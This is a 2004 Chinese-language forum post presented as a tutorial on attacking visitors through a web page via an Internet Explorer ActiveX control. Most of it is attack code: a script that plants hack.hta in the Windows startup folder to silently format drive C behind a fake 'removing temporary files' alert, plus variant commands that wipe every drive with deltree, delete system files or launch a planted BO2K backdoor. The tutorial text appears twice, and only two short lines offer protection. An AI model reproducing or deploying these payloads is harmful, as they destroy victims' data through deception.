|
論壇說明 |
歡迎您來到『史萊姆論壇』 ^___^ 您目前正以訪客的身份瀏覽本論壇,訪客所擁有的權限將受到限制,您可以瀏覽本論壇大部份的版區與文章,但您將無法參與任何討論或是使用私人訊息與其他會員交流。若您希望擁有完整的使用權限,請註冊成為我們的一份子,註冊的程序十分簡單、快速,而且最重要的是--註冊是完全免費的! 請點擊這裡:『註冊成為我們的一份子!』 |
|
主題工具 | 顯示模式 |
2004-10-23, 06:41 AM | #1 |
榮譽會員
|
超酷手段:通過網頁攻擊客戶端機
文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的。注:文章就是通過Active控件進行攻擊,攻擊程序中使用format.exe,從而達到格式化客戶端機磁牒的目的.
防護辦法:不執行不知名的Active控件或者把機器中那些不太常用的指令,如format.exe,進行更名. 文章作者︰f\*\*k 前敘︰ 這項技術是在沒多久以前台灣所流行的攻擊法,你知道利用漏洞的厲害在哪嗎? 這一項教學就是利用微軟( Microsoft )的IE瀏覽器( Internet Explorer )所衍生出來的 攻擊方法。 教學開始︰ 以下這段就是具有破壞性的HTML Hacking Your Computer . scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"; scr.Doc=" wsh.Run('start.exe /m format c:/q /autotest /u'); alert('IMPORTANT : Windows is removing unused temporary files.');"; scr.write(); (懂HTML的人應該就看得出來其中精隨) 現在我大概來解釋其中幾個項目所寫的意思 scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta" 這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta wsh.Run('start.exe /m format c:/q /autotest /u'); 通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。 它是一個微軟沒有公開的功能,按鍵輸入後format的動作便會被強制執行。 這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。 最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。 執行其他攻擊指令的方法︰ 只要修改「start.exe /m format c:/q /autotest /u」這一項便形。 start.exe /m format c:/q /autotest /u 其中的「c:」可以換做其他的硬碟。 (path)\bo2k.exe 執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。 start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 殺掉對方硬碟底下所有的檔案。 start.exe /m deltree /y c:\windows\system\*.* 殺掉對方c:\windows\system\目錄底下的所有檔案。 後敘︰ 預防遭此手段的破壞就是到微軟去更新你的瀏覽器。 以下這段就是具有破壞性的HTML Hacking Your Computer . scr.Reset(); scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta"; scr.Doc=" wsh.Run('start.exe /m format c:/q /autotest /u'); alert('IMPORTANT : Windows is removing unused temporary files.');"; scr.write(); (懂HTML的人應該就看得出來其中精隨) 現在我大概來解釋其中幾個項目所寫的意思 scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\啟動\\hack.hta" 這一項就是指當你看到這網頁它會寫入到你的電腦啟動目錄底下,並命名為hack.hta wsh.Run('start.exe /m format c:/q /autotest /u'); 通常要格式化硬碟都會先問你是否要執行,但其中的"/autotest"這項。 它是一個微軟沒有公開的功能,按鍵輸入後format的動作便會被強制執行。 這項中的/q /u是令系統不需要檢查硬碟便會立即執行的指令。 最後start.exe再配合/m選項可以使format的DOS-prompt視窗在執行的時候處於最小化的狀態。 執行其他攻擊指令的方法︰ 只要修改「start.exe /m format c:/q /autotest /u」這一項便形。 start.exe /m format c:/q /autotest /u 其中的「c:」可以換做其他的硬碟。 (path)\bo2k.exe 執行它電腦中的某個程式,如果你有傳bo2k到它電腦中就可以使用此指令。 start.exe /m deltree /y a:\*.* c:\*.* d:\*.* 殺掉對方硬碟底下所有的檔案。 start.exe /m deltree /y c:\windows\system\*.* 殺掉對方c:\windows\system\目錄底下的所有檔案。 後敘︰ 預防遭此手段的破壞就是到微軟去更新你的瀏覽器。 |
送花文章: 3,
|